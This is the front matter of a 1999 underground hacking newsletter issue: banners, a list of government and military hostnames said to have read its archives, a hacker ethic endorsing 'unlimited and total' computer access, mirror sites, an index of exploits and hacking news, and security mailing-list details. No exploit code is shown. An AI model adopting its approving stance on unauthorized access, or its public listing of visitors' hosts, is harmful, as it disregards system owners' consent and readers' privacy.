[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 40 Volume 1 1999 Oct 31st 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Rule #1 Noone talks about fightclub! _ )) .-'-'--. // | \ \ \ | | | | | | \ \| / / / `~~~~~~' __ __ _____ __ _ / / / /___ _____ ____ __ __ / ___/____ _____ ___ / /_ ____ _(_)___ / /_/ / __ `/ __ \/ __ \/ / / / \__ \/ __ `/ __ `__ \/ __ \/ __ `/ / __ \ / __ / /_/ / /_/ / /_/ / /_/ / ___/ / /_/ / / / / / / / / / /_/ / / / / / /_/ /_/\__,_/ .___/ .___/\__, / /____/\__,_/_/ /_/ /_/_/ /_/\__,_/_/_/ /_/ /_/ /_/ /____/ __ __ __ ____ _ _/_// / / /___ _/ / /___ _ _____ ___ ____ | | / / / /_/ / __ `/ / / __ \ | /| / / _ \/ _ \/ __ \ / / / / / __ / /_/ / / / /_/ / |/ |/ / __/ __/ / / / / / / / /_/ /_/\__,_/_/_/\____/|__/|__/\___/\___/_/ /_/_/_/ |_| /_/ _ )) .-'-'--. // | \ \ \ | | | | | | \ \| / / / `~~~~~~' =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Today the spotlight may be on you, some interesting machines that have accessed these archives recently... 
infosec.se gate2.mcbutler.usmc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov dodo.nist.gov kwai11.nsf.gov enduser.faa.gov
vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg
amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil
marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar
ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil
kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au
unknown-c-23-147.latimes.com nytgate1.nytimes.com

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

http://www.csoft.net/~hwa

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits of
the true hacker is a profoundly antibureaucratic and democratic spirit. That
spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since
formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've endeavoured
to format all text to 80 cols except for articles and site statements and
urls which are posted verbatim. I've decided to continue with this method
unless more people complain. The zine is best viewed in 1024x768 mode with
UEDIT.... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

*  Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed the file
   size limitations imposed by the sites :-( please only use these if no
   other recourse is available.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html
** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN, nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info. It's a labour of love and
will be continued for as long as I feel like it. I'm not motivated by
dollars or the illusion of fame. Did you ever notice how the most
famous/infamous hackers are the ones that get caught? There's a lot to be
said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #40
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by and
idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=--------------------------------------------------------------------------=
Issue #40
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

`ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

Quote of the week from irc.core.com's MOTD

   Y IS MY CPS GOING DOWN>>>>
   nEuSpEeD: Because when you type in caps, it takes more bandwidth.
   s
   nEuSpEeD: Therefore, your cps drops
   OH ok

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Two states tangle with 'cyber terrorist'.........................
04.0 .. Tempest Information Made Available ..............................
05.0 .. Virus That Hit Marines Identified ...............................
06.0 .. Love sick hacker hits Microsoft hard.............................
07.0 .. Russian ATMs Compromised ........................................
08.0 .. Kentucky Emergency Sirens Activated - Hacker Blamed .............
09.0 .. Over 24 Variants of Melissa Found With More to Come .............
10.0 .. Online Threats Labeled Cyberterrorism ...........................
11.0 .. QPOP 2.41beta1 exploit (linux x86) by mastoras...................
12.0 .. ls0f.c Vulnerable: linux machines running lsof 4.40..............
13.0 .. Free phone calls over the internet in the US.....................
14.0 .. Are You a Cyberspace Addict?.....................................
15.0 .. Congressman Lobbies IETF For Privacy ............................
16.0 .. The King Of Hidden Directories by Zym0t1c........................
17.0 .. The Hidden Directories text referred to in 16.0 (kM/mr Disco)....
18.0 .. Cable + Wireless Security Compromised ...........................
19.0 .. Yugo Cyber War Not As Widespread As First Thought................
20.0 .. England To Launch High Tech Crime Unit ..........................
21.0 .. First Project Macro Virus Discovered ............................
22.0 .. Microsoft Web Page Defaced ......................................
23.0 .. Rubi-Con Wants You! .............................................
24.0 .. Clinton Signs Phone-Tracking Bill Under 911 Cover ...............
25.0 .. Carry Tax on Dollars Proposed ...................................
26.0 .. $250 Million in Police Tech Approved ............................
27.0 .. Interview With Web Inventor .....................................
28.0 .. Computer Attacks Up Sharply in Hong Kong ........................
29.0 .. AOL Password Scams Abound .......................................
30.0 .. United Loan Gunmen Return .......................................
31.0 .. Flipz' exploit...................................................
32.0 .. Fuqrag interview.................................................
33.0 .. Privacy and Encryption Labeled Antisocial By DOJ ................
34.0 .. B02K Reviewed By WinNT Magazine .................................
35.0 .. MP3 Pirates Beware ..............................................
36.0 .. Red Herring Reviews Defcon ......................................
37.0 .. Hong Kong to Create Government Gateway ..........................
38.0 .. .mil and .gov Defacements on the Increase .......................
39.0 .. CNet Chooses Top Ten 'Hacks' ....................................
40.0 .. MSNBC Special Report ............................................
41.0 .. Cops Receive Info on Internet Crime Fighting ....................
42.0 .. LSU Experiences DOS Attack ......................................
43.0 .. Oklahoma Paging System Vandalized ...............................
44.0 .. You Thought You Were Safe .......................................
45.0 .. The Weather Channel and Four More .gov/.mil Sites Defaced .......
46.0 .. Nerds Will Fight Next World War .................................
47.0 .. Hole Found in Mac OS 9 ..........................................
48.0 .. Time Spreads Cable Modem FUD ....................................
49.0 .. DutchThreat Quit?................................................
50.0 .. Can you protect your image on the net?...........................
51.0 .. Do secure email sites offer foolproof safety?....................
52.0 .. Celtech ExpressFS USER Buffer Overflow Vulnerability ............
53.0 .. Netscape Messaging Server RCPT TO DoS Vulnerability..............
54.0 .. WFTPD Remote Buffer Overflow Vulnerability.......................
55.0 .. Pacific Software URL Live! Directory Traversal vulnerability.....
56.0 .. InfoSec for dummies parts I and II ..............................
57.0 .. Thwarting the systems cracker parts 1 to 6.......................
58.0 .. Crossroads: Linux networking and security........................
59.0 .. Cool phone stuff on the internet (Check out mytalk its leet!)....
60.0 .. Securing DNS in FreeBSD/OpenBSD..................................
61.0 .. Getting someone's IP thru ICQ without a hacking proggie..........
62.0 .. Intrusion detection within a secured network.....................
63.0 .. Preparing your Linux box for the internet: Armoring Linux........
64.0 .. Securing DNS (Linux version).....................................
65.0 .. Exploit for FreeBSD sperl4.036 by OVX............................
666.0 .. tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);...............
67.0 .. dopewarez.c exploit for Dopewars.................................
68.0 .. Linux forged packets.............................................
69.0 .. Nashuatec printer is vulnerable to various attacks...............
70.0 .. xmonisdn bug.....................................................
71.0 .. Nasty stack smashing bug in Linux-2.2.12 execve .................
72.0 .. Finjan exploit alert.............................................
73.0 .. Hybrid network cablemodems.......................................
74.0 .. HP Printer display hack (source code)............................
75.0 .. Omni-NFS/X Enterprise version 6.1................................
76.0 .. More IE5 vulnerabilities.........................................
77.0 .. Insanity (Gov-boi from www.hack.co.za) dies in a car crash.......
78.0 .. "Secret" Nokia phone codes.......................................
79.0 .. Realnetworks snooping? ..........................................
80.0 .. Copying DVD movies?..............................................
81.0 .. Elite irc falls..................................................

=-------------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in
        return thats tres cool, if not we'll consider ur ad anyways so
        send it in. ads for other zines are ok too btw just mention us in
        yours, please remember to include links and an email contact.
        Corporate ads will be considered also and if your company wishes
        to donate to or participate in the upcoming Canc0n99 event send in
        your suggestions and ads now...n.b date and time may be pushed
        back join mailing list for up to date information...............
        Current dates: POSTPONED til further notice, place: TBA..........

Ha.Ha .. Humour and puzzles ............................................
         Hey You!........................................................
         =------=........................................................
         Send in humour for this section! I need a laugh and its hard to
         find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT
NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News is
news so i'll print any and all news but will quote sources when the source
is known, if it's good enough for CNN it's good enough for me. And i'm doing
it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic
dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~
reading this from some interesting places, make my day and get a mention in
the zine, send in a postcard, I realize that some places it is cost
prohibitive but if you have the time and money be a cool dude / gal and send
a poor guy a postcard preferably one that has some scenery from your place
of residence for my collection, I collect stamps too so you kill two birds
with one stone by being cool and mailing in a postcard, return address not
necessary, just a "hey guys being cool in Bahrain, take it easy" will do ...
;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
  ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Websites;

sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance). Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux, no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/          Electronic Underground Affiliation
http://ech0.cjb.net                 ech0 Security
http://axon.jccc.net/hir/           Hackers Information Report
http://net-security.org             Net Security
http://www.403-security.org         Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and
may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it to
the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file)
started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that reproduction
of those words without your permission in any medium outside the
distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on
June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to
SECURITYFOCUS.COM.
What is Security Focus you ask? Wait and read below. Other than the change
of domains nothing of how the list is run changes. I am still the moderator.
We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives go
back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to resubscribe.
All your information, including subscription options will be moved
transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into
mail folders by examining the From address will have to update them to
include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit
of BUGTRAQ where non-English speaking people or people that don't feel
comfortable speaking English can exchange information.

As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will
continue to be the place to submit vulnerability information, but if you
feel more comfortable using some other language you can give the other
lists a try. All relevant information from the other lists which have not
already been covered here will be translated and forwarded on by the list
moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese)
which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will
be moderated by CORE SDI S.A. from Argentina (the folks that brought you
Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same time
providing a comprehensive source of security information.
Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek
Girl herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If you
are interested in viewing the staff pages, please see the 'About' section
on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing
lists we hope you will find useful. A number of them are not scheduled to
start for several weeks but starting today the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the discussion of
  new vulnerabilities. As such I normally don't approve messages about
  break-ins, trojans, viruses, etc with the exception of wide spread cases
  (Melissa, ADM worm, etc). The other choice people are usually left with
  is email CERT but this fails to communicate this important information
  to others that may be potentially affected.

  The Incidents mailing list is a lightly moderated mailing list to
  facilitate the quick exchange of security incident information. Topical
  items include such things as information about rootkits, new trojan
  horses and viruses, source of attacks and tell-tale signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with
ten other forums over the next two months. These forums will be built and
moderated by people in the community as well as vendors who are willing to
take part in the community building process.

*Note to the vendors here* We have several security vendors who have agreed
to run forums where they can participate in the online communities. If you
would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of the
following:

* Vulnerabilities. We are making accessible a free vulnerability database.
  You can search it by vendor, product and keyword. You will find detailed
  information on the vulnerability and how to fix it, as well as links to
  reference information such as email messages, advisories and web pages.
  You can search by vendor, product and keywords. The database itself is
  the result of culling through 5 years of BUGTRAQ plus countless other
  lists and news groups. It's a shining example of how thorough full
  disclosure has made a significant impact on the industry over the last
  half decade.

* Products. An incredible number of categorized security products from
  over two hundred different vendors.

* Services. A large and focused directory of security services offered by
  vendors.

* Books, Papers and Articles. A vast number of categorized security related
  books, papers and articles. Available to download directly from our
  servers when possible.

* Tools. A large array of free security tools. Categorized and available
  for download.

* News: A vast number of security news articles going all the way back to
  1995.

* Security Resources: A directory to other security resources on the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display only
information you may be interested in. You can filter by categories,
keywords and operating systems, as well as configure how much data to
display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as
long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful. I
invite you to visit http://www.securityfocus.com/ and check it out for
yourself. If you have any comments or suggestions please feel free to
contact me at this address or at aleph1@securityfocus.com.

Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more.

The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
